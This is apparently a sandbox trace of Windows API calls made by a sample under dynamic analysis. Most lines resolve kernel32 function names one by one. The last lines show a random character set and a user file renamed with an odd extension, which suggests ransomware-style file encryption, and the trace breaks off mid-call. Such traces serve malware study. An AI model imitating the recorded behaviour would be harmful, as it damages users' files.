[0180.868] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0180.868] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0180.868] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0180.868] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0180.868] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0180.868] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0180.868] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0180.868] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0180.868] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0180.868] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0180.868] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0180.868] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0180.868] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0180.868] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0180.868] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0180.869] lstrlenA (lpString="CREATEEVENTA") returned 12 [0180.869] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0180.869] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0180.869] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0180.869] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0180.869] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0180.869] lstrlenA (lpString="CREATEEVENTW") returned 12 [0180.869] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0180.869] lstrlenA (lpString="CREATEFIBER") returned 11 [0180.869] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0180.869] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0180.869] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0180.869] lstrlenA (lpString="CREATEFILEA") returned 11 [0180.869] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0180.869] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0180.869] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0180.869] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0180.869] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0180.869] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0180.869] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0180.869] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0180.869] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0180.869] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0180.869] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0180.869] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0180.869] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0180.869] lstrlenA (lpString="CREATEFILEW") returned 11 [0180.869] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0180.869] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0180.869] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0180.869] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0180.869] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0180.869] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0180.869] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0180.869] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0180.869] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0180.869] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0180.870] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0180.870] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0180.870] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0180.870] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0180.870] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0180.870] lstrlenA (lpString="CREATEJOBSET") returned 12 [0180.870] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0180.870] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0180.870] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0180.870] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0180.870] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0180.870] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0180.870] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0180.870] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0180.870] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0180.870] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0180.870] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0180.870] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0180.870] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0180.870] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0180.870] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0180.870] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0180.870] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0180.870] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0180.870] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0180.870] lstrlenA (lpString="CREATEPIPE") returned 10 [0180.870] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0180.870] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0180.870] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0180.870] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0180.870] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0180.870] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0180.870] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0180.870] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0180.870] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0180.870] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0180.870] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0180.870] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0180.870] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0180.871] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0180.871] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0180.871] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0180.871] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0180.871] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0180.871] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0180.871] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0180.871] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0180.871] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0180.871] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0180.871] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0180.871] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0180.871] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0180.871] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0180.871] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0180.871] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0180.871] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0180.871] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0180.871] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0180.871] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0180.871] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0180.871] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0180.871] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0180.871] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0180.871] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0180.871] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0180.871] lstrlenA (lpString="CREATETHREAD") returned 12 [0180.871] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0180.871] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0180.871] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0180.871] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0180.871] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0180.871] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0180.871] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0180.871] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0180.871] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0180.871] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0180.872] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0180.872] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0180.872] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0180.872] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0180.872] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0180.872] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0180.872] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0180.872] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0180.872] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0180.872] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0180.872] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0180.872] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0180.872] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0180.872] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0180.872] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0180.872] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0180.872] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0180.872] lstrlenA (lpString="CTRLROUTINE") returned 11 [0180.872] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0180.872] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0180.872] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0180.872] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0180.872] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0180.872] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0180.872] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0180.872] lstrlenA (lpString="DEBUGBREAK") returned 10 [0180.872] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0180.872] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0180.872] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0180.872] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0180.872] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0180.872] lstrlenA (lpString="DECODEPOINTER") returned 13 [0180.872] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0180.872] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0180.872] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0180.872] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0180.872] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0180.872] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0180.873] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0180.873] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0180.873] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0180.873] lstrlenA (lpString="DELETEATOM") returned 10 [0180.873] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0180.873] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0180.873] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0180.873] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0180.873] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0180.873] lstrlenA (lpString="DELETEFIBER") returned 11 [0180.873] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0180.873] lstrlenA (lpString="DELETEFILEA") returned 11 [0180.873] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0180.873] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0180.873] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0180.873] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0180.873] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0180.873] lstrlenA (lpString="DELETEFILEW") returned 11 [0180.873] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0180.873] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0180.873] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0180.873] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0180.873] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0180.873] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0180.873] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0180.873] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0180.873] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0180.873] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0180.873] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0180.873] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0180.873] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0180.873] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0180.873] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0180.873] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0180.873] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0180.873] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0180.873] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0180.874] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0180.874] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0180.874] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0180.874] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0180.874] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0180.874] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0180.874] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0180.874] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0180.874] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0180.874] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0180.874] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0180.874] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0180.874] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0180.874] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0180.874] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0180.874] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0180.874] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0180.874] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0180.874] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0180.874] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0180.874] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0180.874] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0180.874] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0180.874] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0180.874] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0180.874] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0180.874] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0180.874] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0180.874] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0180.874] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0180.874] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0180.874] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0180.874] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0180.874] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0180.874] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0180.874] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0180.874] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0180.874] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0180.875] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0180.875] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0180.875] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0180.875] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0180.875] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0180.875] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0180.875] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0180.875] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0180.875] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0180.875] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0180.875] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0180.875] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.Y2TS7") returned 104 [0180.875] wsprintfW (in: 